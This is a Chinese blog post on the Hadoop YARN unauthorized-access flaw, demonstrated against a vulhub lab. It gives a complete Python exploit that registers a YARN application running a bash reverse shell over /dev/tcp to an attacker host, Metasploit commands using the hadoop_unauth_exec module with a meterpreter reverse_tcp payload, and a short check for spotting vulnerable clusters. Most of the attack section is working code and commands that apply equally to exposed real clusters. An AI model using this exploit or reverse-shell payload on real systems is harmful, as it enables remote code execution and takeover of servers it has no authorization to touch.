首页 > 极客资料 博客日记
Hadoop未授权访问
2024-11-01 20:30:03极客资料围观13次
这篇文章介绍了Hadoop未授权访问,分享给大家做个参考,收藏极客之家收获更多编程知识
Hadoop未授权访问
是什么?
Hadoop 是一种用来处理和存储大量数据的软件工具,可以用来日志分析,推荐系统,数据备份
核心组件:
存储大数据:HDFS 文件系统
处理大数据:MapReduce
管理资源:YARN
漏洞成因(本质是API路径未授权):
默认开放的REST API端口: YARN的RESTAP默认开放在8088和8090端口,如果未进行适当的访问控制,攻击者可以利用这些API进行未授权访问。
靶场:vulhub/hadoop/unauthorized-yarn
# 开启靶场
docker-compose up -d
利用方式一(脚本利用)
1.访问靶机8088端口,看到存在未授权访问漏洞
2.通过脚本利用(通过python3执行脚本即可)
#!/usr/bin/env python
import requests
# 漏洞目标URL
target = 'http://127.0.0.1:8088/'
# 反弹Shell 攻击机IP地址,监听6666端口
lhost = '192.168.0.1'
url = target + 'ws/v1/cluster/apps/new-application'
resp = requests.post(url)
app_id = resp.json()['application-id']
url = target + 'ws/v1/cluster/apps'
data = {
'application-id': app_id,
'application-name': 'get-shell',
'am-container-spec': {
'commands': {
'command': '/bin/bash -i >& /dev/tcp/攻击机ip/6666 0>&1'
},
},
'application-type': 'YARN',
}
requests.post(url, json=data)
利用方式二(msf利用)
利用msf模块
msfconsole -q
use exploit/linux/http/hadoop_unauth_exec
set rhosts 192.168.81.127
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.81.238
set lport 5566
exploit
漏洞发现
POST访问如下URL,返回application-id,则表明存在漏洞
http://ip:8088/ws/v1/cluster/apps/new-application
总结
- 漏洞成因是开启了Hadoop Web 管理页面,端口一般为8088或8090
- 所以可以通过访问接口发现是否存在漏洞
版权声明:本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:jacktools123@163.com进行投诉反馈,一经查实,立即删除!
标签:
相关文章
最新发布
- Nuxt.js 应用中的 prerender:routes 事件钩子详解
- 【问题解决】Tomcat由低于8版本升级到高版本使用Tomcat自带连接池报错无法找到表空间的问题
- 【FAQ】HarmonyOS SDK 闭源开放能力 —Vision Kit
- 六、Spring Boot集成Spring Security之前后分离认证流程最佳方案
- 《JVM第7课》堆区
- .NET 8 高性能跨平台图像处理库 ImageSharp
- 还在为慢速数据传输苦恼?Linux 零拷贝技术来帮你!
- 刚毕业,去做边缘业务,还有救吗?
- 如何避免 HttpClient 丢失请求头:通过 HttpRequestMessage 解决并优化
- 让性能提升56%的Vue3.5响应式重构之“版本计数”